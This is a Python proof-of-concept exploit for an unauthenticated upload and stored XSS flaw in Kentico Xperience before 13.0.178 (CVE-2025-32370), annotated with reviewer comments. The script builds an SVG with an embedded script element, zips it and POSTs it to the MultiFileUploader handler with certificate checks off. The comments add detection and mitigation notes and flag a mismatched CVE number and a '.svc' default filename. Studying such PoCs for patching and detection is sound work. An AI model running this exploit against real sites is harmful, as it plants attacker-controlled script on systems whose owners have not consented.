# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
#
# Reviewer summary (defensive reading of this PoC):
#   - The script writes an SVG whose <script> element runs alert("XSS"),
#     wraps it in a zip archive using the external `zip` CLI, and POSTs the
#     archive as application/octet-stream to the upload handler given via
#     --url, passing the archive name in a `Filename` query parameter.
#   - According to the header above, versions before 13.0.178 are affected;
#     the patched release is the primary mitigation.
#   - Detection opportunity: POSTs to the MultiFileUploader handler carrying
#     a zip archive that contains an SVG with a <script> element.
#   - Note the CVE identifier in the argparse description below
#     (CVE-2025-2748) differs from the one in this header (CVE-2025-32370);
#     one of them is presumably a typo - confirm against the source link.

import requests
import subprocess
import os  # NOTE(review): imported but not used anywhere in this script
import argparse


def create_svg_payload(svg_filename: str) -> None:
    """Write an SVG containing an inline <script> element to *svg_filename*.

    The file is opened in text mode without an explicit encoding, so the
    platform default is used; the payload is plain ASCII so this is harmless
    here, but it is worth knowing when reproducing in a lab.

    Args:
        svg_filename: Path of the SVG file to create (overwritten if present).
    """
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    # Minimal SVG 1.1 document: one polygon plus a <script> element. Any
    # viewer that renders the SVG inline and executes scripts will run it;
    # serving user-supplied SVG as an attachment or sanitising it prevents that.
    svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)


def zip_payload(svg_filename: str, zip_filename: str) -> None:
    """Archive *svg_filename* into *zip_filename* using the external ``zip`` tool.

    The argv is passed as a list (no shell), so the filenames are not subject
    to shell interpretation. ``check=True`` makes a non-zero exit status raise
    ``subprocess.CalledProcessError``. Presumably a ``zip`` binary must be on
    PATH; the stdlib ``zipfile`` module would remove that dependency.

    Args:
        svg_filename: File to place inside the archive.
        zip_filename: Archive to create (``zip`` appends if it already exists).

    Raises:
        subprocess.CalledProcessError: if ``zip`` exits non-zero.
    """
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)


def upload_zip(zip_filename: str, target_url: str) -> None:
    """POST the raw bytes of *zip_filename* to *target_url*.

    The archive name is appended as a ``Filename`` query parameter together
    with ``Complete=false``; neither value is URL-encoded, so a name
    containing ``&``, ``=`` or ``#`` would corrupt the query string.
    ``verify=False`` disables TLS certificate validation for the request,
    which also means the session can be intercepted - acceptable only in an
    isolated lab. Success is judged solely on an HTTP 200 status.

    Args:
        zip_filename: Local archive to send as the request body.
        target_url: Upload handler URL (the query string is appended here).
    """
    full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
    headers = {
        "Content-Type": "application/octet-stream"
    }
    print(f"[+] Uploading {zip_filename} to {full_url}")
    # The file object is streamed as the body; requests closes nothing here,
    # the ``with`` block does.
    with open(zip_filename, 'rb') as f:
        response = requests.post(full_url, headers=headers, data=f, verify=False)
    if response.status_code == 200:
        print("[+] Upload succeeded")
    else:
        # The response body is echoed to help diagnose rejections (e.g. a
        # patched host or a WAF); it may be large.
        print(f"[-] Upload failed with status code {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    # NOTE(review): the CVE named here does not match the header (CVE-2025-32370).
    parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - Unauthenticated ZIP file upload with embedded SVG for XSS.")
    parser.add_argument("--url", required=True, help="Target upload URL (e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
    # NOTE(review): the default name uses a ".svc" extension although the help
    # text (and create_svg_payload) describe an SVG file - confirm intended.
    parser.add_argument("--svg", default="poc.svc", help="SVG filename to embed inside the zip")
    parser.add_argument("--zip", default="exploit.zip", help="Name of the output zip file")
    args = parser.parse_args()
    # Pipeline: write SVG -> zip it -> upload. Each step prints its progress;
    # a failing ``zip`` invocation aborts before any network traffic is sent.
    create_svg_payload(args.svg)
    zip_payload(args.svg, args.zip)
    upload_zip(args.zip, args.url)